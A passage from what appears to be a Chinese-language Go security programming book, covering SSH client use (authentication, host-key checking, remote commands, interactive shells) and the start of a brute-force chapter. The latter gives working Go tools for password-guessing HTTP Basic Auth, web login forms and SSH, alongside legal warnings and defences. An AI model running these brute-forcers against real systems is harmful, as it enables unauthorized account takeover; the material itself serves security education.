   numBytesRead, err := connection.Read(buffer)
   if err != nil {
      log.Println("Error reading from socket. ", err)
      os.Exit(1)
   }
   fmt.Printf("Read %d bytes to the socket.\n", numBytesRead)
   fmt.Printf("Message received:\n%s\n", buffer)
}

其他加密包

以下部分没有源代码示例,但值得一提。这些由 Go 提供的包是建立在前面示例中演示的原则之上的。

OpenPGP

PGP 代表相当好的隐私,而 OpenPGP 是标准 RFC 4880。PGP 是一个方便的套件,用于加密文本、文件、目录和磁盘。所有原则都与前一节中讨论的 SSL 和 TLS 密钥/证书相同。加密、签名和验证都是一样的。Go 提供了一个 OpenPGP 包。在godoc.org/golang.org/x/crypto/openpgp上阅读更多关于它的信息。

离线记录(OTR)消息

离线记录OTR消息是一种端到端加密,用户可以加密他们在任何消息媒介上的通信。这很方便,因为你可以在任何协议上实现加密层,即使协议本身是未加密的。例如,OTR 消息可以在 XMPP、IRC 和许多其他聊天协议上运行。许多聊天客户端,如 Pidgin、Adium 和 Xabber,都支持 OTR,无论是本地支持还是通过插件支持。Go 提供了一个用于实现 OTR 消息的包。在godoc.org/golang.org/x/crypto/otr/上阅读更多关于 Go 的 OTR 支持的信息。

总结

阅读完本章后,您应该对 Go 密码包的功能有很好的理解。使用本章中提供的示例作为参考,您应该能够轻松地执行基本的哈希操作、加密、解密、生成密钥和使用密钥。

此外,您应该了解对称加密和非对称加密之间的区别,以及它与哈希的不同之处。您应该对运行 TLS 服务器和与 TLS 客户端连接的基础有所了解。

请记住,目标不是记住每一个细节,而是记住有哪些选项可供选择,以便您可以选择最适合工作的工具。

在下一章中,我们将讨论使用安全外壳(也称为 SSH)。首先介绍了使用公钥和私钥对以及密码进行身份验证,以及如何验证远程主机的密钥。我们还将介绍如何在远程服务器上执行命令以及如何创建交互式外壳。安全外壳利用了本章讨论的加密技术。这是加密的最常见和实用的应用之一。继续阅读,了解更多关于在 Go 中使用 SSH 的内容。

第七章:安全外壳(SSH)

安全外壳SSH)是一种用于在不安全网络上通信的加密网络协议。 SSH 最常见的用途是连接到远程服务器并与 shell 进行交互。文件传输也通过 SSH 协议上的 SCP 和 SFTP 进行。 SSH 是为了取代明文协议 Telnet 而创建的。 随着时间的推移,已经有了许多 RFC 来定义 SSH。 以下是部分列表,以便让您了解定义的内容。 由于它是如此常见和关键的协议,值得花时间了解细节。 以下是一些 RFC:

稍后还对标准进行了额外的扩展,您可以在en.wikipedia.org/wiki/Secure_Shell#Standards_documentation上阅读相关内容。

SSH 是互联网上常见的暴力破解和默认凭据攻击目标。 因此,您可能考虑将 SSH 放在非标准端口上,但保持在系统端口(小于 1024)上,以便低特权用户在服务关闭时无法潜在地劫持端口。 如果将 SSH 保留在默认端口上,则诸如fail2ban之类的服务对于限制速率和阻止暴力破解攻击至关重要。 理想情况下,应完全禁用密码身份验证,并要求密钥身份验证。

SSH 包并不随标准库一起打包,尽管它是由 Go 团队编写的。 它正式是 Go 项目的一部分,但在主 Go 源树之外,因此默认情况下不会随 Go 一起安装。 它可以从golang.org/获取,并且可以使用以下命令进行安装:

go get golang.org/x/crypto/ssh

在本章中,我们将介绍如何使用 SSH 客户端进行连接,执行命令和使用交互式 shell。 我们还将介绍使用密码或私钥等不同的身份验证方法。 SSH 包提供了用于创建服务器的函数,但本书中我们只涵盖客户端。

本章将专门涵盖 SSH 的以下内容:

  • 使用密码进行身份验证

  • 使用私钥进行身份验证

  • 验证远程主机的密钥

  • 通过 SSH 执行命令

  • 启动交互式 shell

使用 Go SSH 客户端

golang.org/x/crypto/ssh包提供了一个与 SSH 版本 2 兼容的 SSH 客户端,这是最新版本。该客户端将与 OpenSSH 服务器以及遵循 SSH 规范的任何其他服务器一起工作。它支持传统的客户端功能,如子进程、端口转发和隧道。

身份验证方法

身份验证不仅是第一步,也是最关键的一步。不正确的身份验证可能导致机密性、完整性和可用性的潜在损失。如果未验证远程服务器,可能会发生中间人攻击,导致窃听、操纵或阻止数据。弱密码身份验证可能会被暴力攻击利用。

这里提供了三个例子。第一个例子涵盖了密码认证,这是常见的,但由于密码的熵和位数与加密密钥相比较低,因此不建议使用。第二个例子演示了如何使用私钥对远程服务器进行身份验证。这两个例子都忽略了远程主机提供的公钥。这是不安全的,因为您可能最终连接到一个您不信任的远程主机,但对于测试来说已经足够了。身份验证的第三个例子是理想的流程。它使用密钥进行身份验证并验证远程服务器。

请注意,本章不使用 PEM 格式的密钥文件,而是使用 SSH 格式的密钥,这是处理 SSH 最常见的格式。这些例子与 OpenSSH 工具和密钥兼容,如sshsshdssh-keygenssh-copy-idssh-keyscan

我建议您使用ssh-keygen生成用于身份验证的公钥和私钥对。这将以 SSH 密钥格式生成id_rsaid_rsa.pub文件。ssh-keygen工具是 OpenSSH 项目的一部分,并且默认情况下已经打包到 Ubuntu 中:

ssh-keygen

使用ssh-copy-id将您的公钥(id_rsa.pub)复制到远程服务器的~/.ssh/authorized_keys文件中,以便您可以使用私钥进行身份验证:

ssh-copy-id yourserver.com

使用密码进行身份验证

通过 SSH 进行密码身份验证是最简单的方法。此示例演示了如何使用ssh.ClientConfig结构配置 SSH 客户端,然后使用ssh.Dial()连接到 SSH 服务器。客户端被配置为使用密码,通过指定ssh.Password()作为身份验证函数:

package main

import (
   "golang.org/x/crypto/ssh"
   "log"
)

var username = "username"
var password = "password"
var host = "example.com:22"

func main() {
   config := &ssh.ClientConfig{
      User: username,
      Auth: []ssh.AuthMethod{
         ssh.Password(password),
      },
      HostKeyCallback: ssh.InsecureIgnoreHostKey(),
   }
   client, err := ssh.Dial("tcp", host, config)
   if err != nil {
      log.Fatal("Error dialing server. ", err)
   }

   log.Println(string(client.ClientVersion()))
} 

使用私钥进行身份验证

与密码相比,私钥具有一些优势。它比密码长得多,使得暴力破解变得更加困难。它还消除了输入密码的需要,使连接到远程服务器变得更加方便。无密码身份验证对于需要在没有人为干预的情况下自动运行的 cron 作业和其他服务也是有帮助的。一些服务器完全禁用密码身份验证并要求使用密钥。

在您可以使用私钥进行身份验证之前,远程服务器将需要您的公钥作为授权密钥。

如果您的系统上有ssh-copy-id工具,您可以使用它。它将把您的公钥复制到远程服务器,放置在您的家目录 SSH 目录(~/.ssh/authorized_keys)中,并设置正确的权限:

ssh-copy-id example.com 

下面的例子与前面的例子类似,我们使用密码进行身份验证,但ssh.ClientConfig被配置为使用ssh.PublicKeys()作为身份验证函数,而不是ssh.Password()。我们还将创建一个名为getKeySigner()的特殊函数,以便从文件中加载客户端的私钥:

package main

import (
   "golang.org/x/crypto/ssh"
   "io/ioutil"
   "log"
)

var username = "username"
var host = "example.com:22"
var privateKeyFile = "/home/user/.ssh/id_rsa"

func getKeySigner(privateKeyFile string) ssh.Signer {
   privateKeyData, err := ioutil.ReadFile(privateKeyFile)
   if err != nil {
      log.Fatal("Error loading private key file. ", err)
   }

   privateKey, err := ssh.ParsePrivateKey(privateKeyData)
   if err != nil {
      log.Fatal("Error parsing private key. ", err)
   }
   return privateKey
}

func main() {
   privateKey := getKeySigner(privateKeyFile)
   config := &ssh.ClientConfig{
      User: username,
      Auth: []ssh.AuthMethod{
         ssh.PublicKeys(privateKey), // Pass 1 or more key
      },
      HostKeyCallback: ssh.InsecureIgnoreHostKey(),
   }

   client, err := ssh.Dial("tcp", host, config)
   if err != nil {
      log.Fatal("Error dialing server. ", err)
   }

   log.Println(string(client.ClientVersion()))
} 

请注意,您可以将多个私钥传递给ssh.PublicKeys()函数。它接受无限数量的密钥。如果您提供多个密钥,但只有一个适用于服务器,它将自动使用适用的密钥。

如果您想使用相同的配置连接到多台服务器,这将非常有用。您可能希望使用 1,000 个唯一的私钥连接到 1,000 个不同的主机。您可以重用包含所有私钥的单个配置,而不必创建多个 SSH 客户端配置。

验证远程主机

要验证远程主机,在ssh.ClientConfig中,将HostKeyCallback设置为ssh.FixedHostKey(),并传递远程主机的公钥。如果您尝试连接到服务器并提供了不同的公钥,连接将被中止。这对于确保您连接到预期的服务器而不是恶意服务器非常重要。如果 DNS 受到损害,或者攻击者执行了成功的 ARP 欺骗,您的连接可能会被重定向或成为中间人攻击的受害者,但攻击者将无法模仿真实服务器而没有相应的服务器私钥。出于测试目的,您可以选择忽略远程主机提供的密钥。

这个例子是连接最安全的方式。它使用密钥进行身份验证,而不是密码,并验证远程服务器的公钥。

此方法将使用ssh.ParseKnownHosts()。这使用标准的known_hosts文件。known_hosts格式是 OpenSSH 的标准。该格式在sshd(8)手册页中有文档记录。

请注意,Go 的ssh.ParseKnownHosts()只会解析单个条目,因此您应该创建一个包含服务器单个条目的唯一文件,或者确保所需的条目位于文件顶部。

要获取远程服务器的公钥以进行验证,请使用ssh-keyscan。这将以known_hosts格式返回服务器密钥,将在以下示例中使用。请记住,Go 的ssh.ParseKnownHosts命令只读取known_hosts文件的第一个条目:

ssh-keyscan yourserver.com

ssh-keyscan程序将返回多个密钥类型,除非使用-t标志指定密钥类型。确保选择具有所需密钥算法的密钥类型,并且ssh.ClientConfig()中列出的HostKeyAlgorithm与之匹配。此示例包括每个可能的ssh.KeyAlgo*选项。我建议您选择尽可能高强度的算法,并且只允许该选项:

package main

import (
   "golang.org/x/crypto/ssh"
   "io/ioutil"
   "log"
)

var username = "username"
var host = "example.com:22"
var privateKeyFile = "/home/user/.ssh/id_rsa"

// Known hosts only reads FIRST entry
var knownHostsFile = "/home/user/.ssh/known_hosts"

func getKeySigner(privateKeyFile string) ssh.Signer {
   privateKeyData, err := ioutil.ReadFile(privateKeyFile)
   if err != nil {
      log.Fatal("Error loading private key file. ", err)
   }

   privateKey, err := ssh.ParsePrivateKey(privateKeyData)
   if err != nil {
      log.Fatal("Error parsing private key. ", err)
   }
   return privateKey
}

func loadServerPublicKey(knownHostsFile string) ssh.PublicKey {
   publicKeyData, err := ioutil.ReadFile(knownHostsFile)
   if err != nil {
      log.Fatal("Error loading server public key file. ", err)
   }

   _, _, publicKey, _, _, err := ssh.ParseKnownHosts(publicKeyData)
   if err != nil {
      log.Fatal("Error parsing server public key. ", err)
   }
   return publicKey
}

func main() {
   userPrivateKey := getKeySigner(privateKeyFile)
   serverPublicKey := loadServerPublicKey(knownHostsFile)

   config := &ssh.ClientConfig{
      User: username,
      Auth: []ssh.AuthMethod{
         ssh.PublicKeys(userPrivateKey),
      },
      HostKeyCallback: ssh.FixedHostKey(serverPublicKey),
      // Acceptable host key algorithms (Allow all)
      HostKeyAlgorithms: []string{
         ssh.KeyAlgoRSA,
         ssh.KeyAlgoDSA,
         ssh.KeyAlgoECDSA256,
         ssh.KeyAlgoECDSA384,
         ssh.KeyAlgoECDSA521,
         ssh.KeyAlgoED25519,
      },
   }

   client, err := ssh.Dial("tcp", host, config)
   if err != nil {
      log.Fatal("Error dialing server. ", err)
   }

   log.Println(string(client.ClientVersion()))
} 

请注意,除了ssh.KeyAlgo*常量之外,如果使用证书,还有ssh.CertAlgo*常量。

通过 SSH 执行命令

现在我们已经建立了多种身份验证和连接到远程 SSH 服务器的方式,我们需要让ssh.Client开始工作。到目前为止,我们只是打印出客户端版本。第一个目标是执行单个命令并查看输出。

一旦创建了ssh.Client,就可以开始创建会话。一个客户端可以同时支持多个会话。会话有自己的标准输入、输出和错误。它们是标准的读取器和写入器接口。

要执行命令,有几个选项:Run()Start()Output()CombinedOutput()。它们都非常相似,但行为略有不同:

  • session.Output(cmd): Output()函数将执行命令,并将session.Stdout作为字节片返回。

  • session.CombinedOutput(cmd): 这与Output()相同,但它返回标准输出和标准错误的组合。

  • session.Run(cmd): Run()函数将执行命令并等待其完成。它将填充标准输出和错误缓冲区,但不会对其进行任何操作。您必须手动读取缓冲区,或在调用Run()之前将会话输出设置为转到终端输出(例如,session.Stdout = os.Stdout)。只有在程序以错误代码0退出并且没有复制标准输出缓冲区时,它才会返回而不出现错误。

  • session.Start(cmd): Start()函数类似于Run(),但它不会等待命令完成。如果要阻塞执行直到命令完成,必须显式调用session.Wait()。这对于启动长时间运行的命令或者对应用程序流程有更多控制的情况非常有用。

一个会话只能执行一个操作。一旦调用Run()Output()CombinedOutput()Start()Shell(),就不能再使用该会话执行任何其他命令。如果需要运行多个命令,可以用分号将它们串联在一起。例如,可以像这样在单个命令字符串中传递多个命令:

df -h; ps aux; pwd; whoami;

否则,您可以为需要运行的每个命令创建一个新会话。一个会话等同于一个命令。

以下示例使用密钥认证连接到远程 SSH 服务器,然后使用client.NewSession()创建一个会话。然后将会话的标准输出连接到我们本地终端的标准输出,然后调用session.Run(),这将在远程服务器上执行命令:

package main

import (
   "golang.org/x/crypto/ssh"
   "io/ioutil"
   "log"
   "os"
)

var username = "username"
var host = "example.com:22"
var privateKeyFile = "/home/user/.ssh/id_rsa"
var commandToExecute = "hostname"

func getKeySigner(privateKeyFile string) ssh.Signer {
   privateKeyData, err := ioutil.ReadFile(privateKeyFile)
   if err != nil {
      log.Fatal("Error loading private key file. ", err)
   }

   privateKey, err := ssh.ParsePrivateKey(privateKeyData)
   if err != nil {
      log.Fatal("Error parsing private key. ", err)
   }
   return privateKey
}

func main() {
   privateKey := getKeySigner(privateKeyFile)
   config := &ssh.ClientConfig{
      User: username,
      Auth: []ssh.AuthMethod{
         ssh.PublicKeys(privateKey),
      },
      HostKeyCallback: ssh.InsecureIgnoreHostKey(),
   }

   client, err := ssh.Dial("tcp", host, config)
   if err != nil {
      log.Fatal("Error dialing server. ", err)
   }

   // Multiple sessions per client are allowed
   session, err := client.NewSession()
   if err != nil {
      log.Fatal("Failed to create session: ", err)
   }
   defer session.Close()

   // Pipe the session output directly to standard output
   // Thanks to the convenience of writer interface
   session.Stdout = os.Stdout

   err = session.Run(commandToExecute)
   if err != nil {
      log.Fatal("Error executing command. ", err)
   }
} 

启动交互式 shell

在前面的例子中,我们演示了如何运行命令字符串。还有一个选项可以打开一个 shell。通过调用session.Shell(),可以执行一个交互式登录 shell,加载用户的默认 shell 和默认配置文件(例如.profile)。调用session.RequestPty()是可选的,但是当请求一个伪终端时,shell 的工作效果要好得多。您可以将终端名称设置为xtermvt100linux或其他自定义名称。如果由于输出颜色值而导致输出混乱的问题,可以尝试使用vt100,如果仍然不起作用,可以使用非标准的终端名称或您知道不支持颜色的终端名称。许多程序会在不识别终端名称时禁用颜色输出。一些程序在未知的终端类型下根本无法工作,比如tmux

有关 Go 终端模式常量的更多信息,请访问godoc.org/golang.org/x/crypto/ssh#TerminalModes。终端模式标志是 POSIX 标准,并在RFC 4254终端模式的编码(第 8 节)中定义,您可以在tools.ietf.org/html/rfc4254#section-8找到。

以下示例使用密钥认证连接到 SSH 服务器,然后使用client.NewSession()创建一个新会话。与前面的例子不同,我们将使用session.RequestPty()来获取一个交互式 shell,远程会话的标准输入、输出和错误流都连接到本地终端,因此您可以像与任何其他 SSH 客户端(例如 PuTTY)一样实时交互:

package main

import (
   "fmt"
   "golang.org/x/crypto/ssh"
   "io/ioutil"
   "log"
   "os"
)

func checkArgs() (string, string, string) {
   if len(os.Args) != 4 {
      printUsage()
      os.Exit(1)
   }
   return os.Args[1], os.Args[2], os.Args[3]
}

func printUsage() {
   fmt.Println(os.Args[0] + ` - Open an SSH shell

Usage:
  ` + os.Args[0] + ` <username> <host> <privateKeyFile>

Example:
  ` + os.Args[0] + ` nanodano devdungeon.com:22 ~/.ssh/id_rsa
`)
}

func getKeySigner(privateKeyFile string) ssh.Signer {
   privateKeyData, err := ioutil.ReadFile(privateKeyFile)
   if err != nil {
      log.Fatal("Error loading private key file. ", err)
   }

   privateKey, err := ssh.ParsePrivateKey(privateKeyData)
   if err != nil {
      log.Fatal("Error parsing private key. ", err)
   }
   return privateKey
}

func main() {
   username, host, privateKeyFile := checkArgs()

   privateKey := getKeySigner(privateKeyFile)
   config := &ssh.ClientConfig{
      User: username,
      Auth: []ssh.AuthMethod{
         ssh.PublicKeys(privateKey),
      },
      HostKeyCallback: ssh.InsecureIgnoreHostKey(),
   }

   client, err := ssh.Dial("tcp", host, config)
   if err != nil {
      log.Fatal("Error dialing server. ", err)
   }

   session, err := client.NewSession()
   if err != nil {
      log.Fatal("Failed to create session: ", err)
   }
   defer session.Close()

   // Pipe the standard buffers together
   session.Stdout = os.Stdout
   session.Stdin = os.Stdin
   session.Stderr = os.Stderr

   // Get psuedo-terminal
   err = session.RequestPty(
      "vt100", // or "linux", "xterm"
      40,      // Height
      80,      // Width
      // https://godoc.org/golang.org/x/crypto/ssh#TerminalModes
      // POSIX Terminal mode flags defined in RFC 4254 Section 8.
      // https://tools.ietf.org/html/rfc4254#section-8
      ssh.TerminalModes{
         ssh.ECHO: 0,
      })
   if err != nil {
      log.Fatal("Error requesting psuedo-terminal. ", err)
   }

   // Run shell until it is exited
   err = session.Shell()
   if err != nil {
      log.Fatal("Error executing command. ", err)
   }
   session.Wait()
} 

总结

阅读完本章后,您现在应该了解如何使用 Go SSH 客户端连接和使用密码或私钥进行身份验证。此外,您现在应该了解如何在远程服务器上执行命令或开始交互式会话。

您如何以编程方式应用 SSH 客户端?您能想到任何用例吗?您管理多个远程服务器吗?您能自动化任何任务吗?

SSH 包还包含用于创建 SSH 服务器的类型和函数,但我们在本书中没有涵盖它们。阅读有关创建 SSH 服务器的更多信息,请访问godoc.org/golang.org/x/crypto/ssh#NewServerConn,以及有关 SSH 包的更多信息,请访问godoc.org/golang.org/x/crypto/ssh

在下一章中,我们将讨论暴力攻击,即猜测密码,直到最终找到正确的密码为止。暴力破解是我们可以使用 SSH 客户端以及其他协议和应用程序进行的操作。继续阅读下一章,了解如何执行暴力攻击。

第八章:暴力破解

暴力破解攻击,也称为穷举密钥攻击,是指您尝试对输入的每种可能组合,直到最终获得正确的组合。最常见的例子是暴力破解密码。您可以尝试每种字符、字母和符号的组合,或者您可以使用字典列表作为密码的基础。您可以在线找到基于常见密码的字典和预构建的单词列表,或者您可以创建自己的列表。

有不同类型的暴力破解密码攻击。有在线攻击,例如反复尝试登录网站或数据库。由于网络延迟和带宽限制,在线攻击速度较慢。服务也可能在太多失败尝试后对帐户进行速率限制或锁定。另一方面,还有离线攻击。离线攻击的一个例子是当您在本地硬盘上有一个充满哈希密码的数据库转储,并且您可以无限制地进行暴力破解,除了物理硬件。严肃的密码破解者会构建配备了几张强大图形卡的计算机,用于破解,这样的计算机成本高达数万美元。

关于在线暴力破解攻击的一点需要注意的是,它们很容易被检测到,会产生大量流量,可能会给服务器带来沉重负载,甚至完全使其崩溃,并且未经许可是非法的。在线服务方面的许可可能会让人产生误解。例如,仅因为您在 Facebook 等服务上拥有帐户,并不意味着您有权对自己的帐户进行暴力破解攻击。Facebook 仍然拥有服务器,即使只针对您的帐户,您也没有权限攻击他们的网站。即使您在 Amazon 服务器上运行自己的服务,例如 SSH 服务,您仍然没有权限进行暴力破解攻击。您必须请求并获得对 Amazon 资源进行渗透测试的特殊许可。您可以使用自己的虚拟机进行本地测试。

网络漫画xkcd有一部漫画与暴力破解密码的主题完美相关:

来源:https://xkcd.com/936/

大多数,如果不是所有这些攻击,都可以使用以下一种或多种技术进行保护:

  • 强密码(最好是口令或密钥)

  • 实施失败尝试的速率限制/临时锁定

  • 使用 CAPTCHA

  • 添加双因素认证

  • 加盐密码

  • 限制对服务器的访问

本章将涵盖几个暴力破解的例子,包括以下内容:

  • HTTP 基本认证

  • HTML 登录表单

  • SSH 密码认证

  • 数据库

暴力破解 HTTP 基本认证

HTTP 基本认证是指您在 HTTP 请求中提供用户名和密码。您可以在现代浏览器中将其作为 URL 的一部分传递。考虑以下示例:

http://username:password@www.example.com

在编程时添加基本认证时,凭据以名为Authorization的 HTTP 标头提供,其中包含以 base64 编码并以Basic为前缀,用空格分隔的username:password值。考虑以下示例:

Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=

Web 服务器在认证失败时通常会响应401 Access Denied代码,并且应该以200 OK2xx成功代码进行响应。

此示例将获取一个 URL 和一个username值,并尝试使用生成的密码进行登录。

为了减少此类攻击的效果,可以在一定数量的登录尝试失败后实施速率限制功能或帐户锁定功能。

如果您需要从头开始构建自己的密码列表,请尝试从维基百科中记录的最常见密码开始en.wikipedia.org/wiki/List_of_the_most_common_passwords。以下是一个可以保存为passwords.txt的简短示例:

password
123456
qwerty
abc123
iloveyou
admin
passw0rd

将前面代码块中的列表保存为一个文本文件,每行一个密码。名称不重要,因为你会将密码列表文件名作为命令行参数提供:

package main 

import ( 
   "bufio" 
   "fmt" 
   "log" 
   "net/http" 
   "os" 
) 

func printUsage() { 
   fmt.Println(os.Args[0] + ` - Brute force HTTP Basic Auth 

Passwords should be separated by newlines. 
URL should include protocol prefix. 

Usage: 
  ` + os.Args[0] + ` <username> <pwlistfile> <url> 

Example: 
  ` + os.Args[0] + ` admin passwords.txt https://www.test.com 
`) 
} 

func checkArgs() (string, string, string) { 
   if len(os.Args) != 4 { 
      log.Println("Incorrect number of arguments.") 
      printUsage() 
      os.Exit(1) 
   } 

   // Username, Password list filename, URL 
   return os.Args[1], os.Args[2], os.Args[3] 
} 

func testBasicAuth(url, username, password string, doneChannel chan bool) { 
   client := &http.Client{} 
   request, err := http.NewRequest("GET", url, nil) 
   request.SetBasicAuth(username, password) 

   response, err := client.Do(request) 
   if err != nil { 
      log.Fatal(err) 
   } 
   if response.StatusCode == 200 { 
      log.Printf("Success!\nUser: %s\nPassword: %s\n", username,   
         password) 
      os.Exit(0) 
    } 
    doneChannel <- true 
} 

func main() { 
   username, pwListFilename, url := checkArgs() 

   // Open password list file 
   passwordFile, err := os.Open(pwListFilename) 
   if err != nil { 
      log.Fatal("Error opening file. ", err) 
   } 
   defer passwordFile.Close() 

   // Default split method is on newline (bufio.ScanLines) 
   scanner := bufio.NewScanner(passwordFile) 

   doneChannel := make(chan bool) 
   numThreads := 0 
   maxThreads := 2 

   // Check each password against url 
   for scanner.Scan() { 
      numThreads += 1 

      password := scanner.Text() 
      go testBasicAuth(url, username, password, doneChannel) 

      // If max threads reached, wait for one to finish before continuing 
      if numThreads >= maxThreads { 
         <-doneChannel 
         numThreads -= 1 
      } 
   } 

   // Wait for all threads before repeating and fetching a new batch 
   for numThreads > 0 { 
      <-doneChannel 
      numThreads -= 1 
   } 
} 

暴力破解 HTML 登录表单

几乎每个具有用户系统的网站都在网页上提供登录表单。我们可以编写一个程序来重复提交登录表单。这个例子假设在 Web 应用程序上没有 CAPTCHA、速率限制或其他阻止机制。请记住不要对任何生产站点或您不拥有或没有权限的站点执行此攻击。如果您想测试它,我建议您设置一个本地 Web 服务器并仅在本地测试。

每个网络表单都可以使用不同的名称创建用户名密码字段,因此这些字段的名称需要在每次运行时提供,并且必须特定于目标 URL。

查看源代码或检查目标表单,以获取输入元素的name属性以及form元素的目标action属性。如果form元素中没有提供操作 URL,则默认为当前 URL。另一个重要的信息是表单上使用的方法。登录表单应该是POST,但有可能编码不好,使用了GET方法。有些登录表单使用 JavaScript 提交表单,可能完全绕过标准的表单方法。使用这种逻辑的站点需要更多的逆向工程来确定最终的提交目的地和数据格式。您可以使用 HTML 代理或在浏览器中使用网络检查器查看 XHR 请求。

后面的章节将讨论 Web 爬取和在DOM接口中查询特定元素的方法,但本章不会讨论尝试自动检测表单字段并识别正确的输入元素。这一步必须在这里手动完成,但一旦识别出来,暴力攻击就可以自行运行。

为了防止这样的攻击,实施一个 CAPTCHA 系统或速率限制功能。

请注意,每个 Web 应用程序都可以有自己的身份验证方式。这不是一刀切的解决方案。它提供了一个基本的HTTP POST表单登录示例,但需要针对不同的应用程序进行轻微修改。

package main 

import ( 
   "bufio" 
   "bytes" 
   "fmt" 
   "log" 
   "net/http" 
   "os" 
) 

func printUsage() { 
   fmt.Println(os.Args[0] + ` - Brute force HTTP Login Form 

Passwords should be separated by newlines. 
URL should include protocol prefix. 
You must identify the form's post URL and username and password   
field names and pass them as arguments. 

Usage: 
  ` + os.Args[0] + ` <pwlistfile> <login_post_url> ` + 
      `<username> <username_field> <password_field> 

Example: 
  ` + os.Args[0] + ` passwords.txt` +
      ` https://test.com/login admin username password 
`) 
} 

func checkArgs() (string, string, string, string, string) { 
   if len(os.Args) != 6 { 
      log.Println("Incorrect number of arguments.") 
      printUsage() 
      os.Exit(1) 
   } 

   // Password list, Post URL, username, username field, 
   // password field 
   return os.Args[1], os.Args[2], os.Args[3], os.Args[4], os.Args[5] 
} 

func testLoginForm( 
   url, 
   userField, 
   passField, 
   username, 
   password string, 
   doneChannel chan bool, 
) 
{ 
   postData := userField + "=" + username + "&" + passField + 
      "=" + password 
   request, err := http.NewRequest( 
      "POST", 
      url, 
      bytes.NewBufferString(postData), 
   ) 
   client := &http.Client{} 
   response, err := client.Do(request) 
   if err != nil { 
      log.Println("Error making request. ", err) 
   } 
   defer response.Body.Close() 

   body := make([]byte, 5000) // ~5k buffer for page contents 
   response.Body.Read(body) 
   if bytes.Contains(body, []byte("ERROR")) { 
      log.Println("Error found on website.") 
   } 
   log.Printf("%s", body) 

   if bytes.Contains(body,[]byte("ERROR")) || response.StatusCode != 200 { 
      // Error on page or in response code 
   } else { 
      log.Println("Possible success with password: ", password) 
      // os.Exit(0) // Exit on success? 
   } 

   doneChannel <- true 
} 

func main() { 
   pwList, postUrl, username, userField, passField := checkArgs() 

   // Open password list file 
   passwordFile, err := os.Open(pwList) 
   if err != nil { 
      log.Fatal("Error opening file. ", err) 
   } 
   defer passwordFile.Close() 

   // Default split method is on newline (bufio.ScanLines) 
   scanner := bufio.NewScanner(passwordFile) 

   doneChannel := make(chan bool) 
   numThreads := 0 
   maxThreads := 32 

   // Check each password against url 
   for scanner.Scan() { 
      numThreads += 1 

      password := scanner.Text() 
      go testLoginForm( 
         postUrl, 
         userField, 
         passField, 
         username, 
         password, 
         doneChannel, 
      ) 

      // If max threads reached, wait for one to finish before  
      //continuing 
      if numThreads >= maxThreads { 
         <-doneChannel 
         numThreads -= 1 
      } 
   } 

   // Wait for all threads before repeating and fetching a new batch 
   for numThreads > 0 { 
      <-doneChannel 
      numThreads -= 1 
   } 
} 

暴力破解 SSH

安全外壳或 SSH 支持几种身份验证机制。如果服务器只支持公钥身份验证,那么暴力破解几乎是徒劳的。这个例子只会讨论 SSH 的密码身份验证。

为了防止这样的攻击,实施速率限制或使用类似 fail2ban 的工具,在检测到一定数量的登录失败尝试时,锁定帐户一段时间。还要禁用 root 远程登录。有些人喜欢将 SSH 放在非标准端口上,但最终放在高端口号的非受限端口上,比如2222,这不是一个好主意。如果您使用高端口号的非特权端口,另一个低特权用户可能会劫持该端口,并在其位置上启动自己的服务。如果要更改端口,将 SSH 守护程序放在低于1024的端口上。

这种攻击显然在日志中很吵闹,容易被检测到,并且被 fail2ban 等工具阻止。但如果您正在进行渗透测试,检查速率限制或帐户锁定是否存在可以作为一种快速方法。如果没有配置速率限制或临时帐户锁定,暴力破解和 DDoS 是潜在的风险。

运行此程序需要从golang.org获取一个 SSH 包。您可以使用以下命令获取它:

go get golang.org/x/crypto/ssh

安装所需的ssh包后,可以运行以下示例:

package main 

import ( 
   "bufio" 
   "fmt" 
   "log" 
   "os" 

   "golang.org/x/crypto/ssh" 
) 

func printUsage() { 
   fmt.Println(os.Args[0] + ` - Brute force SSH Password 

Passwords should be separated by newlines. 
URL should include hostname or ip with port number separated by colon 

Usage: 
  ` + os.Args[0] + ` <username> <pwlistfile> <url:port> 

Example: 
  ` + os.Args[0] + ` root passwords.txt example.com:22 
`) 
} 

func checkArgs() (string, string, string) { 
   if len(os.Args) != 4 { 
      log.Println("Incorrect number of arguments.") 
      printUsage() 
      os.Exit(1) 
   } 

   // Username, Password list filename, URL 
   return os.Args[1], os.Args[2], os.Args[3] 
} 

func testSSHAuth(url, username, password string, doneChannel chan bool) { 
   sshConfig := &ssh.ClientConfig{ 
      User: username, 
      Auth: []ssh.AuthMethod{ 
         ssh.Password(password), 
      }, 
      // Do not check server key 
      HostKeyCallback: ssh.InsecureIgnoreHostKey(), 

      // Or, set the expected ssh.PublicKey from remote host 
      //HostKeyCallback: ssh.FixedHostKey(pubkey), 
   } 

   _, err := ssh.Dial("tcp", url, sshConfig) 
   if err != nil { 
      // Print out the error so we can see if it is just a failed   
      // auth or if it is a connection/name resolution problem. 
      log.Println(err) 
   } else { // Success 
      log.Printf("Success!\nUser: %s\nPassword: %s\n", username,   
      password) 
      os.Exit(0) 
   } 

   doneChannel <- true // Signal another thread spot has opened up 
} 

func main() { 

   username, pwListFilename, url := checkArgs() 

   // Open password list file 
   passwordFile, err := os.Open(pwListFilename) 
   if err != nil { 
      log.Fatal("Error opening file. ", err) 
   } 
   defer passwordFile.Close() 

   // Default split method is on newline (bufio.ScanLines) 
   scanner := bufio.NewScanner(passwordFile) 

   doneChannel := make(chan bool) 
   numThreads := 0 
   maxThreads := 2 

   // Check each password against url 
   for scanner.Scan() { 
      numThreads += 1 

      password := scanner.Text() 
      go testSSHAuth(url, username, password, doneChannel) 

      // If max threads reached, wait for one to finish before continuing 
      if numThreads >= maxThreads { 
         <-doneChannel 
         numThreads -= 1 
      } 
   } 

   // Wait for all threads before repeating and fetching a new batch 
   for numThreads > 0 { 
      <-doneChannel 
      numThreads -= 1 
   } 
} 

暴力破解数据库登录

数据库登录可以像其他方法一样自动化和暴力破解。在以前的暴力破解示例中,大部分代码都是相同的。这些应用程序之间的主要区别在于实际测试身份验证的函数。而不是再次重复所有的代码,这些片段将简单地演示如何登录到各种数据库。修改以前的暴力破解脚本,以测试其中一个而不是 SSH 或 HTTP 方法。

为了防止这种情况发生,限制对数据库的访问只允许需要它的机器,并禁用根远程登录。

Go 标准库中没有提供任何数据库驱动程序,只有接口。因此,所有这些数据库示例都需要来自 GitHub 的第三方包,以及一个正在运行的数据库实例进行连接。本书不涵盖如何安装和配置这些数据库服务。可以使用go get命令安装这些包中的每一个:

